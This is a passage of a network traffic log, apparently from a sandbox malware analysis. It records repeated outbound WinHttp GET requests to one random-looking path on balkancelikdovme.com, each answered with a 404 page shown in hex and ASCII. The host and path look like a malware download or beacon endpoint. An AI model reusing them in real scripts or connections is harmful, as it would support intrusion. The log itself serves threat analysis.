33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:09:03.577011108 CEST	101	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:09:03.614670992 CEST	102	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:09:03 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:09:03.969207048 CEST	102	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:09:04.001975060 CEST	103	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:09:03 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:09:04.250616074 CEST	103	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:09:04.285022974 CEST	104	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:09:04 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:09:04.548708916 CEST	105	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:09:04.581475973 CEST	106	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:09:04 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:09:04.844924927 CEST	106	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:09:04.878179073 CEST	107	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:09:04 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:09:05.129462004 CEST	107	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:09:05.168360949 CEST	108	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:09:05 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:09:05.421052933 CEST	109	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
